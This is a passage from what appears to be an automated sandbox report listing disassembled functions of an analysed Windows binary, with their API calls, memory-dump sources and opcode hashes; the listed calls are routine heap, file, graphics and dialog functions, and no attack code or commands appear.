                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseCriticalHandleSection$DeleteEnterLeaveReleaseSemaphore
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3265325312-0
                                                                                                                                        • Opcode ID: a7321896aa8f2523588f4cdefc4ae9ae1d99cad28501aa7365415d714b4a6dce
                                                                                                                                        • Instruction ID: 76fc1b6666a46d60cb19a7af6c8e37b64c3912a82eef1f1abab4994c924c8641
                                                                                                                                        • Opcode Fuzzy Hash: a7321896aa8f2523588f4cdefc4ae9ae1d99cad28501aa7365415d714b4a6dce
                                                                                                                                        • Instruction Fuzzy Hash: 67F0A432205214BB9A116724FC8497AB72CD687765366822BFC04E3242DB2DAC4143B4
                                                                                                                                        Function 007919B1 Relevance: 1.8, APIs: 1, Instructions: 275COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: H_prolog
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3519838083-0
                                                                                                                                        • Opcode ID: d7bb474acb9ac30a07b1378dd7a9cc201287e6dfe5a666acd47ca29f1566f4be
                                                                                                                                        • Instruction ID: 3f6332269fda3ed3782c26d87e30ea95b13edeed5c337532eb902d81dd15afd1
                                                                                                                                        • Opcode Fuzzy Hash: d7bb474acb9ac30a07b1378dd7a9cc201287e6dfe5a666acd47ca29f1566f4be
                                                                                                                                        • Instruction Fuzzy Hash: 5BB1D270A04647AEEF19CF78D484BF9FBA6FF05304F94825AE46593281C739A874CB91
                                                                                                                                        Function 0079820B Relevance: 1.6, APIs: 1, Instructions: 110COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • __EH_prolog.LIBCMT ref: 00798210
                                                                                                                                          • Part of subcall function 0079137E: __EH_prolog.LIBCMT ref: 00791383
                                                                                                                                          • Part of subcall function 0079137E: new.LIBCMT ref: 007913FB
                                                                                                                                          • Part of subcall function 007919B1: __EH_prolog.LIBCMT ref: 007919B6
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: H_prolog
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3519838083-0
                                                                                                                                        • Opcode ID: b066e694d5f2e983e0a9ae18ea48b87120eb6d7b1acc62b2f185fbaf1f1be7b7
                                                                                                                                        • Instruction ID: 1579760b52871c95b2d2f95bb73df9c0439162ed408ad783800e636fa7e64b9a
                                                                                                                                        • Opcode Fuzzy Hash: b066e694d5f2e983e0a9ae18ea48b87120eb6d7b1acc62b2f185fbaf1f1be7b7
                                                                                                                                        • Instruction Fuzzy Hash: 9841C271940658DADF20EB60EC59BEE73B8AF51300F0400EAE48A93092DF786FC8DB51
                                                                                                                                        Function 007A21E6 Relevance: 1.6, APIs: 1, Instructions: 90COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: H_prolog
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3519838083-0
                                                                                                                                        • Opcode ID: da98dd705b0d4f42b1c039357bc27ad6e05b47f849b043f00816f34949fd9f1b
                                                                                                                                        • Instruction ID: 6e90381b8b3618d2965fb2669d37289fd96c148a3668c1eca291aae5dd2c56dd
                                                                                                                                        • Opcode Fuzzy Hash: da98dd705b0d4f42b1c039357bc27ad6e05b47f849b043f00816f34949fd9f1b
                                                                                                                                        • Instruction Fuzzy Hash: 9C2128B1E40215AFDB14DFB8CC4576B7668FB56314F00073AE505EB682D7789D01C6E8
                                                                                                                                        Function 007A9485 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • __EH_prolog.LIBCMT ref: 007A948A
                                                                                                                                          • Part of subcall function 0079137E: __EH_prolog.LIBCMT ref: 00791383
                                                                                                                                          • Part of subcall function 0079137E: new.LIBCMT ref: 007913FB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: H_prolog
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3519838083-0
                                                                                                                                        • Opcode ID: bd6ad16a1f743c989e0803dba1f1a699f452eef3ae289f15c53c26cd7aaedba4
                                                                                                                                        • Instruction ID: fab72b8c1f1806688ba0917bf47065367e1690d03c1fb7743579cc08a77f366f
                                                                                                                                        • Opcode Fuzzy Hash: bd6ad16a1f743c989e0803dba1f1a699f452eef3ae289f15c53c26cd7aaedba4
                                                                                                                                        • Instruction Fuzzy Hash: 5A21A372C04249DACF15DF94D9515EEB7B4FF5A300F5005EAE809A3242D7396E15CF60
                                                                                                                                        Function 007990D0 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: H_prolog
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3519838083-0
                                                                                                                                        • Opcode ID: 262b32542ec310f06d1308e1a1807c16ff854b917f8370ef160240daf7480791
                                                                                                                                        • Instruction ID: ad8c7382cbfc4de0fcde3957e409b92d8feec5afd2798fe0d4e2add8451895b2
                                                                                                                                        • Opcode Fuzzy Hash: 262b32542ec310f06d1308e1a1807c16ff854b917f8370ef160240daf7480791
                                                                                                                                        • Instruction Fuzzy Hash: F6118273A4082AEBCF22AE6CEC9A9DEB735BF48740F054529F91577211DA398D1087E0
                                                                                                                                        Function 007B8EE4 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 007B5A8D: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,007B634D,00000001,00000364,?,007B2213,?,?,007CCBE8), ref: 007B5ACE
                                                                                                                                        • _free.LIBCMT ref: 007B8F50
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateHeap_free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 614378929-0
                                                                                                                                        • Opcode ID: ffe7a698f1ec9d313924040038d8a651e71016dbf9af90b8887af046bf84921e
                                                                                                                                        • Instruction ID: 4d2f9843682fe7fcae85c00331c1edca6dc84115de0af979b1f97cdbe6dbf5a1
                                                                                                                                        • Opcode Fuzzy Hash: ffe7a698f1ec9d313924040038d8a651e71016dbf9af90b8887af046bf84921e
                                                                                                                                        • Instruction Fuzzy Hash: 8401D672204345AFE7218F69D885FAAFBDDEB85370F25062DE59493280EA34A805C675
                                                                                                                                        Function 007B5A8D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,007B634D,00000001,00000364,?,007B2213,?,?,007CCBE8), ref: 007B5ACE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                        • Opcode ID: 1bc7ef61bafad52c918fccbe3691274dd87b8770f571ac201aaf4c21c1115c7a
                                                                                                                                        • Instruction ID: 16abedebc024b7cc4e29a5e6a5861523a02b4792647a5c0ef41b4c71561cd5c9
                                                                                                                                        • Opcode Fuzzy Hash: 1bc7ef61bafad52c918fccbe3691274dd87b8770f571ac201aaf4c21c1115c7a
                                                                                                                                        • Instruction Fuzzy Hash: 41F0B431601E20AAEB216A228C85BDA3F48EF41760F28C215F815FA1A1CA3CD80046E0
                                                                                                                                        Function 007B59FC Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,?,?,007B23AA,?,0000015D,?,?,?,?,007B2F29,000000FF,00000000,?,?), ref: 007B5A2E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                        • Opcode ID: 5a3f1c9239c3a33d75aa00a4fd9f46063fdefee80fe4bc694bd44295eb43af15
                                                                                                                                        • Instruction ID: 84fc69a9f3bd47ec14ec291fa81838ec8056310269534c1c23b48dc556d45a8a
                                                                                                                                        • Opcode Fuzzy Hash: 5a3f1c9239c3a33d75aa00a4fd9f46063fdefee80fe4bc694bd44295eb43af15
                                                                                                                                        • Instruction Fuzzy Hash: 79E06D31101A60AAE6312A659C8ABDA7F48BF567A8F15C324AC16BA1A1DF7CDC0081E5
                                                                                                                                        Function 00795B35 Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • __EH_prolog.LIBCMT ref: 00795B3A
                                                                                                                                          • Part of subcall function 0079AC66: __EH_prolog.LIBCMT ref: 0079AC6B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: H_prolog
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3519838083-0
                                                                                                                                        • Opcode ID: 2c1621380e4449fe97599b957bb2f9ec3bcae38f35370d5cd1c8d97f9ec2173e
                                                                                                                                        • Instruction ID: f251a60920bd1063984bed1b7e7f1ef88df240dc4e7f9f58d39498f309bfaa36
                                                                                                                                        • Opcode Fuzzy Hash: 2c1621380e4449fe97599b957bb2f9ec3bcae38f35370d5cd1c8d97f9ec2173e
                                                                                                                                        • Instruction Fuzzy Hash: F501D130A01689DACF05F7A4E4593DDF7E49F56304F0080ADF85993282EBB82B08D7A3
                                                                                                                                        Function 0079A145 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0079A174
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseFind
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1863332320-0
                                                                                                                                        • Opcode ID: b946723c0949c4a5390467b4a28dca05585b7c9637eb66fa62c59caa03502e1f
                                                                                                                                        • Instruction ID: 4b54bef4933f9505daeb6b02affd80726a0dd52255bbd1efaa60d7f595fe4aac
                                                                                                                                        • Opcode Fuzzy Hash: b946723c0949c4a5390467b4a28dca05585b7c9637eb66fa62c59caa03502e1f
                                                                                                                                        • Instruction Fuzzy Hash: 82F0E23240A780FECE225BB8A808BCB7BA06F06331F008A0DF1FD42292C27D50D59762
                                                                                                                                        Function 00791E8E Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • __EH_prolog.LIBCMT ref: 00791E93
                                                                                                                                          • Part of subcall function 007918F6: __EH_prolog.LIBCMT ref: 007918FB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: H_prolog
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3519838083-0
                                                                                                                                        • Opcode ID: c61e0860e7a2652ae66e854b2c9f771d16a4507e754bdce40aa7a28ce8b7e8ca
                                                                                                                                        • Instruction ID: 67f75d5740b44f3273b78ac94cec17f8eff320364aa1217c2f2362effc02398a
                                                                                                                                        • Opcode Fuzzy Hash: c61e0860e7a2652ae66e854b2c9f771d16a4507e754bdce40aa7a28ce8b7e8ca
                                                                                                                                        • Instruction Fuzzy Hash: 8AF0F8B1D00289DECF41DFA8D8096EEBBF4BB18300F5442BAD409E3202E7384A14CB91
                                                                                                                                        Function 00791E93 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • __EH_prolog.LIBCMT ref: 00791E93
                                                                                                                                          • Part of subcall function 007918F6: __EH_prolog.LIBCMT ref: 007918FB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: H_prolog
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3519838083-0
                                                                                                                                        • Opcode ID: e0ae847181b1538d67acaf3b877b1e0c0f52bda45648bd320df295aee16f3314
                                                                                                                                        • Instruction ID: 5337b2f084c34f9422aa1953e01a6e39c91debde9af673940bca7d615d8fac0e
                                                                                                                                        • Opcode Fuzzy Hash: e0ae847181b1538d67acaf3b877b1e0c0f52bda45648bd320df295aee16f3314
                                                                                                                                        • Instruction Fuzzy Hash: 8FF01CB1C00249DECF41DFA8D4096EEBBF0BB18300F4442BAD409E3202E7384614CB90
                                                                                                                                        Function 0079F8F2 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SetThreadExecutionState.KERNEL32(00000001), ref: 0079F927
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExecutionStateThread
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2211380416-0
                                                                                                                                        • Opcode ID: 2477717f3764a2ed3a63ae9c14f8108184a8064abae7d51091093001a2819167
                                                                                                                                        • Instruction ID: 1b1cd918e97566a9466f16713e0d0f7501a88f55ffd364a40c36b210808b49cd
                                                                                                                                        • Opcode Fuzzy Hash: 2477717f3764a2ed3a63ae9c14f8108184a8064abae7d51091093001a2819167
                                                                                                                                        • Instruction Fuzzy Hash: B1D01791744221A6DE123768790EFFD260B4FCB328F09017DF018E62E28A5D0CA692E2
                                                                                                                                        Function 007A8B65 Relevance: 1.5, APIs: 1, Instructions: 17memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GdipAlloc.GDIPLUS(00000010), ref: 007A8B6B
                                                                                                                                          • Part of subcall function 007A8924: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 007A8945
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Gdip$AllocBitmapCreateFromStream
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1915507550-0
                                                                                                                                        • Opcode ID: 15c49645ae947bc9d886009c95b2f94d8af3cf3aba4b9e0e598e8e73a7603f1a
                                                                                                                                        • Instruction ID: 8cec9b5aadc7ed5b4df06cef77be34cee9307adc42e198be310d8119ed2f6523
                                                                                                                                        • Opcode Fuzzy Hash: 15c49645ae947bc9d886009c95b2f94d8af3cf3aba4b9e0e598e8e73a7603f1a
                                                                                                                                        • Instruction Fuzzy Hash: 6FD05EB0600108BA9B816A608C0697E7AD8EB83350F004229BC04A5150EE76D9206662
                                                                                                                                        Function 0079971A Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetFileType.KERNELBASE(000000FF,0079964C), ref: 00799726
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileType
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3081899298-0
                                                                                                                                        • Opcode ID: dedcf94efdb3349a634848d560175ce07313441976108f18b23bf444483977c0
                                                                                                                                        • Instruction ID: d969552361370a24313d0d602f07291267bbd62ccb69fd5e0d70362cd15f249a
                                                                                                                                        • Opcode Fuzzy Hash: dedcf94efdb3349a634848d560175ce07313441976108f18b23bf444483977c0
                                                                                                                                        • Instruction Fuzzy Hash: D4D01230031200D59E610E7C7E0A0796751DB433A7B28DAECE265C40A1CF2AC843F580
                                                                                                                                        Function 007ABF77 Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 007ABF9C
